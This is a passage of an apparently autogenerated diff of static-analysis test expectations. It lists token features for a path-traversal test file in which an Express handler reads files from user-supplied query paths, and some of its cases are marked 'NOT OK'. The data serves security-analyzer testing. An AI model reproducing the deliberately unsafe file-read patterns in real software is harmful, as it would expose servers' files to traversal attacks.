autogenerated/TaintedPath/normalizedPaths.js:46:24:46:28 | "../" | receiverName | path | +| autogenerated/TaintedPath/normalizedPaths.js:47:5:47:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:47:5:47:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:47:5:47:6 | fs | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:47:5:47:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:47:5:47:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:47:5:47:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:47:5:47:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:47:5:47:19 | fs.readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:47:5:47:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:47:5:47:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:47:5:47:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:47:5:47:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:47:5:47:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:47:5:47:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:47:5:47:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:47:5:47:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:47:5:47:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:47:5:47:25 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:47:5:47:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:47:5:47:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:47:8:47:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:47:8:47:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:47:8:47:19 | readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:47:8:47:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:47:8:47:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:47:21:47:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:47:21:47:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:47:21:47:24 | path | calleeImports | fs | @@ -7728,6 +70649,42 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:47:21:47:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:47:21:47:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:47:21:47:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:49:7:49:45 | !path.s ... le.sep) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:49:7:49:45 | !path.s ... le.sep) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:49:7:49:45 | !path.s ... le.sep) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:49:7:49:45 | !path.s ... le.sep) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:49:7:49:45 | !path.s ... le.sep) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:49:8:49:11 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:49:8:49:11 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:49:8:49:11 | path | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:49:8:49:11 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:49:8:49:11 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:49:8:49:22 | path.startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:49:8:49:22 | path.startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:49:8:49:22 | path.startsWith | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:49:8:49:22 | path.startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:49:8:49:22 | path.startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:49:8:49:45 | exceptional return of path.st ... le.sep) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:49:8:49:45 | exceptional return of path.st ... le.sep) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:49:8:49:45 | exceptional return of path.st ... le.sep) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:49:8:49:45 | exceptional return of path.st ... le.sep) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:49:8:49:45 | exceptional return of path.st ... le.sep) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:49:8:49:45 | path.st ... le.sep) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:49:8:49:45 | path.st ... le.sep) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:49:8:49:45 | path.st ... le.sep) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:49:8:49:45 | path.st ... le.sep) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:49:8:49:45 | path.st ... le.sep) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:49:13:49:22 | startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:49:13:49:22 | startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:49:13:49:22 | startsWith | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:49:13:49:22 | startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:49:13:49:22 | startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:49:24:49:27 | ".." | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:49:24:49:27 | ".." | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:49:24:49:27 | ".." | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:49:24:49:27 | ".." | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:49:24:49:27 | ".." | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:49:24:49:27 | ".." | stringConcatenatedWith | -endpoint- pathModule.sep | | autogenerated/TaintedPath/normalizedPaths.js:49:24:49:44 | ".." + ... ule.sep | CalleeFlexibleAccessPath | path.startsWith | | autogenerated/TaintedPath/normalizedPaths.js:49:24:49:44 | ".." + ... ule.sep | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:49:24:49:44 | ".." + ... ule.sep | calleeImports | path | @@ -7737,6 +70694,47 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:49:24:49:44 | ".." + ... ule.sep | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:49:24:49:44 | ".." + ... ule.sep | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:49:24:49:44 | ".." + ... ule.sep | receiverName | path | +| autogenerated/TaintedPath/normalizedPaths.js:49:31:49:40 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:49:31:49:40 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:49:31:49:40 | pathModule | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:49:31:49:40 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:49:31:49:40 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:49:31:49:44 | pathModule.sep | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:49:31:49:44 | pathModule.sep | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:49:31:49:44 | pathModule.sep | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:49:31:49:44 | pathModule.sep | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:49:31:49:44 | pathModule.sep | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:49:31:49:44 | pathModule.sep | stringConcatenatedWith | '..' -endpoint- | +| autogenerated/TaintedPath/normalizedPaths.js:49:42:49:44 | sep | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:49:42:49:44 | sep | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:49:42:49:44 | sep | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:49:42:49:44 | sep | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:49:42:49:44 | sep | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:50:5:50:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:50:5:50:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:50:5:50:6 | fs | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:50:5:50:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:50:5:50:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:50:5:50:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:50:5:50:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:50:5:50:19 | fs.readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:50:5:50:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:50:5:50:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:50:5:50:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:50:5:50:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:50:5:50:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:50:5:50:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:50:5:50:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:50:5:50:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:50:5:50:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:50:5:50:25 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:50:5:50:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:50:5:50:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:50:8:50:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:50:8:50:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:50:8:50:19 | readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:50:8:50:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:50:8:50:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:50:21:50:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:50:21:50:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:50:21:50:24 | path | calleeImports | fs | @@ -7746,6 +70744,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:50:21:50:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:50:21:50:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:50:21:50:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:53:1:53:3 | app | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:53:1:53:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:53:1:53:3 | app | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:53:1:53:7 | app.get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:53:1:53:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:53:1:53:7 | app.get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:53:1:69:2 | app.get ... T OK\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:53:1:69:2 | app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:53:1:69:2 | app.get ... T OK\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:53:1:69:2 | exceptional return of app.get ... T OK\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:53:1:69:2 | exceptional return of app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:53:1:69:2 | exceptional return of app.get ... T OK\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:53:5:53:7 | get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:53:5:53:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:53:5:53:7 | get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:53:9:53:36 | '/norma ... DotDot' | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:53:9:53:36 | '/norma ... DotDot' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:53:9:53:36 | '/norma ... DotDot' | calleeImports | express | @@ -7753,6 +70766,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:53:9:53:36 | '/norma ... DotDot' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/normalizedPaths.js:53:9:53:36 | '/norma ... DotDot' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:53:9:53:36 | '/norma ... DotDot' | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:53:39:53:38 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:53:39:53:38 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:53:39:53:38 | fs | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:53:39:53:38 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:53:39:53:38 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:53:39:53:38 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:53:39:53:38 | pathModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:53:39:53:38 | pathModule | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:53:39:53:38 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:53:39:53:38 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:53:39:69:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:53:39:69:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:53:39:69:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:53:39:69:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:53:39:69:1 | 'arguments' object of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:53:39:69:1 | (req, r ... OT OK\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:53:39:69:1 | (req, r ... OT OK\\n} | InputArgumentIndex | 1 | | autogenerated/TaintedPath/normalizedPaths.js:53:39:69:1 | (req, r ... OT OK\\n} | calleeImports | express | @@ -7760,11 +70788,81 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:53:39:69:1 | (req, r ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:53:39:69:1 | (req, r ... OT OK\\n} | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:53:39:69:1 | (req, r ... OT OK\\n} | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:53:39:69:1 | exceptional return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:53:39:69:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:53:39:69:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:53:39:69:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:53:39:69:1 | exceptional return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:53:39:69:1 | return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:53:39:69:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:53:39:69:1 | return of anonymous function | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:53:39:69:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:53:39:69:1 | return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:53:40:53:42 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:53:40:53:42 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:53:40:53:42 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:53:40:53:42 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:53:40:53:42 | req | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:53:40:53:42 | req | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:53:40:53:42 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:53:40:53:42 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:53:40:53:42 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:53:40:53:42 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:53:45:53:47 | res | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:53:45:53:47 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:53:45:53:47 | res | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:53:45:53:47 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:53:45:53:47 | res | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:54:7:54:10 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:54:7:54:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:54:7:54:10 | path | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs 